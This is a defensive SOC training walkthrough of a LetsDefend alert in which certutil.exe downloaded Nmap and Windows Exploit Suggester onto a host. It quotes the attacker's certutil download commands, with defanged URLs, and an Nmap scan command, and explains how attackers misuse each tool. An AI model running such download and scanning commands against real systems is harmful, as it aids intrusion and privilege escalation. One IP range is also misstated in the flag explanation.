LetsDefend is a platform for practical training for blue team members. You can improve your skills in log analysis, incident handling, malware analysis and endpoint analysis.
Today a suspicious Certutil.exe usage occured on a host. Certutil is used by threat actors to download files from an external system into a compromised environment.
The investigation start on the Monitoring Page (Figure 1) which simulates a real working Security Operation Center alerts panel. This console offers further details about the security event occuring.
In SOC163 — Suspicious Certutil.exe Usage case, useful host information will help us catch sight of the action taking place, using other tools at our disposal. Always consider the following data when investigating: Event Time, Hostname, IP Address, Related Binary, Binary Path, Command Line and EDR Action.
- Event Time: March 1, 2022 11:06 A.M
- Hostname: EricProd
- IP Address: 172.16.17.22
- Related Binary: certutil.exe
- Binary Path: C:/Windows/System32/certutil.exe
- Command Line: certutil.exe -urlcache -split -f hXXps://nmap[.]org/dist/nmap-7.92-win32.zip nmap.zip
- EDR Action: Allowed
In SOC163 — Suspicious Certutil.exe Usage, the attacker executed a command running an executable named Certutil.
What is Certutil.exe ?
Certutil.exe is a command-line program, installed as part of Certificate Services. You can use it to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.
How hackers use Certutil.exe ?
- Used to decode binaries hidden inside certificate files as Base64 information.
- Used to download files from a given URL.
- Used to install browser root certificates as a precursor to perform Adversary-in-the-Middle between connections to banking websites.
In SOC163 — Suspicious Certutil.exe Usage, the attacker used Certutil to download two files from the internet. The first running command was:
certutil.exe -urlcache -split -f hXXps://nmap[.]org/dist/nmap-7.92-win32.zip nmap.zip
- -urlcache — Displays or deletes URL cache entries
- -split — Embedded ASN.1 element and save it to a file
- -f — Forces overwrite
- hXXps://nmap[.]org/dist/nmap-7.92-win32.zip — URL
- nmap.zip — Filename output
What is Nmap ?
Nmap allows you to scan your network and discover not only everything connected to it, but also a wide variety of information about what’s connected, what services each host is operating, and so on.
Why hackers use Nmap ?
- List services running on remote/local host
- Discover live host on network
- Discover service vulnerabilities using scripting feature in nmap
In SOC163 — Suspicious Certutil.exe Usage, the attacker used Nmap to discover live host service and version on the network by running the following command :
nmap -sV 192.168.0.0/24 -p 80
- -sV — Service and Version Detection
- 192.169.0.0/24 — IP CIDR to scan
- -p 80 — Port to scan
In SOC163 — Suspicious Certutil.exe Usage, the attacker used Certutil to download two files from the internet. The second running command Certutil instance was:
certutil.exe -urlcache -split -f hXXps://raw[.]githubusercontent[.]com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py check.py
What is Windows Exploit Suggester ?
This tool compares a target patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
Why hackers use Windows Exploit Suggester
The hackers use Windows Exploit Suggestor to gain higher-level permissions on the host system.
Let’s now verify these details on the Log Management and Endpoint Security page.
Using the Log Management panel, confirm the suspicious URLs were reached by host 172.16.17.22.
Refer the Command History (Figure 7), the Network Connections (Figure 8) and the Process List (Figure 9) on Endpoint Security page. It simulates a real working Endpoint Detection and Response (EDR) security tool.
As it has been pointed out, numerous suspicious attacker-based commands, network connections and processes list are observed.
Containment
Considering each and every information from our investigation, we are able to define the event as a true positive incident. Containment should be enforced.
- Is the current activity suspicious? — Yes, suspicious
- What is suspicious activity? —Downloading
- Who performed the activity? — User
